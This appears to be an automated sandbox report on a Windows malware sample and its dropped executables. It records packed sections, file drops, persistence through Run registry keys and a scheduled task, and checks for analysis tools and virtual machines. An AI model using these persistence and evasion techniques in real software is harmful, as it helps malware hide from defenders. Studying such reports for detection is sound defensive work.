Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 11.2.skotes.exe.c70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Unpacked PE file: 29.2.b76bb5cee7.exe.aa0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;fozyxqhw:EW;gnsdcfju:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Unpacked PE file: 30.2.U2242U1STHGPPKHG.exe.630000.0.unpack :EW;.rsrc:W;.idata :W;itokqeos:EW;vqtnthmp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Unpacked PE file: 32.2.KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.4d0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qodksccb:EW;reojqbkz:EW;.taggant:EW;
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: random[1].exe.5.dr Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: num[1].exe.5.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: num.exe.5.dr Static PE information: real checksum: 0x0 should be: 0xdb9be
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1edc8f should be: 0x1ecca7
Source: efe6fe4127.exe.5.dr Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: file.exe Static PE information: real checksum: 0x2d49e9 should be: 0x2dfc29
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
Source: random[1].exe0.5.dr Static PE information: real checksum: 0x215498 should be: 0x20f1cd
Source: b76bb5cee7.exe.5.dr Static PE information: real checksum: 0x215498 should be: 0x20f1cd
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: real checksum: 0x2a1f21 should be: 0x29ff4e
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: iktxewek
Source: file.exe Static PE information: section name: nlvjxyrc
Source: file.exe Static PE information: section name: .taggant
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name:
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .idata
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: itokqeos
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: vqtnthmp
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: .taggant
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .idata
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name:
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: qodksccb
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: reojqbkz
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: qodksccb
Source: skotes.exe.4.dr Static PE information: section name: reojqbkz
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.5.dr Static PE information: section name:
Source: random[1].exe.5.dr Static PE information: section name: .idata
Source: random[1].exe.5.dr Static PE information: section name: iktxewek
Source: random[1].exe.5.dr Static PE information: section name: nlvjxyrc
Source: random[1].exe.5.dr Static PE information: section name: .taggant
Source: efe6fe4127.exe.5.dr Static PE information: section name:
Source: efe6fe4127.exe.5.dr Static PE information: section name: .idata
Source: efe6fe4127.exe.5.dr Static PE information: section name: iktxewek
Source: efe6fe4127.exe.5.dr Static PE information: section name: nlvjxyrc
Source: efe6fe4127.exe.5.dr Static PE information: section name: .taggant
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: .rsrc
Source: random[1].exe0.5.dr Static PE information: section name: .idata
Source: random[1].exe0.5.dr Static PE information: section name:
Source: random[1].exe0.5.dr Static PE information: section name: fozyxqhw
Source: random[1].exe0.5.dr Static PE information: section name: gnsdcfju
Source: random[1].exe0.5.dr Static PE information: section name: .taggant
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .rsrc
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .idata
Source: b76bb5cee7.exe.5.dr Static PE information: section name:
Source: b76bb5cee7.exe.5.dr Static PE information: section name: fozyxqhw
Source: b76bb5cee7.exe.5.dr Static PE information: section name: gnsdcfju
Source: b76bb5cee7.exe.5.dr Static PE information: section name: .taggant
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name:
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .idata
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: itokqeos
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: vqtnthmp
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: .taggant
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .idata
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name:
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: qodksccb
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: reojqbkz
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: .taggant
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name:
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .idata
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: itokqeos
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: vqtnthmp
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76018 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A75000 push esi; iretd 0_3_00A76282
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A77161 push esp; ret 0_3_00A772AA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A76441 push edi; retf 0_3_00A76A62
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A1AB0F push ss; ret 0_3_00A1ACAA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A155E0 push ds; retf 0_3_00A155E2
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_00A152C8 pushad ; ret 0_3_00A152C9
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_052C9003 push cs; retf 0_3_052C9004
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E601 push edx; mov dword ptr [esp], 3D0DB58Ch 3_2_0059F3DE
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E601 push ebp; mov dword ptr [esp], 7BFBFE88h 3_2_0059F3E9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CE97 push ecx; mov dword ptr [esp], 7BFE3D07h 3_2_0070CEE9
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0070CE97 push edi; mov dword ptr [esp], 75E25A00h 3_2_0070CF1C
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059E725 push 07789B14h; mov dword ptr [esp], ebp 3_2_0059EB8D
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0071B07C push eax; mov dword ptr [esp], ecx 3_2_0071B495
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0071906E push edi; mov dword ptr [esp], esi 3_2_00719072
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_00709855 push 13B6B500h; mov dword ptr [esp], edx 3_2_0070986F
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Code function: 3_2_0059C069 push ebp; mov dword ptr [esp], edx 3_2_0059C06A
Source: file.exe Static PE information: section name: entropy: 7.970164933759343
Source: YQEN9A9QU4P1VROBPV5YS.exe.0.dr Static PE information: section name: entropy: 7.793826982702039
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: entropy: 7.980350469775883
Source: 99Q4Y3O9GBOXYTDVM9GPHI.exe.0.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.980350469775883
Source: skotes.exe.4.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: random[1].exe.5.dr Static PE information: section name: entropy: 7.970164933759343
Source: efe6fe4127.exe.5.dr Static PE information: section name: entropy: 7.970164933759343
Source: random[1].exe0.5.dr Static PE information: section name: fozyxqhw entropy: 7.952608283646461
Source: b76bb5cee7.exe.5.dr Static PE information: section name: fozyxqhw entropy: 7.952608283646461
Source: U2242U1STHGPPKHG.exe.9.dr Static PE information: section name: entropy: 7.793826982702039
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: entropy: 7.980350469775883
Source: KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe.9.dr Static PE information: section name: qodksccb entropy: 7.953744309551374
Source: 9XHYSBI0DT1C8ABJDSO.exe.12.dr Static PE information: section name: entropy: 7.793826982702039
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003039001\num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\9XHYSBI0DT1C8ABJDSO.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe File created: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1003037001\b76bb5cee7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\KYFYC2TR3U1EFHESW60D8PFEZTPDJOT.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run efe6fe4127.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run b76bb5cee7.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run deecb7b612.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\YQEN9A9QU4P1VROBPV5YS.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\99Q4Y3O9GBOXYTDVM9GPHI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\U2242U1STHGPPKHG.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1003038001\deecb7b612.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\taskkill.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
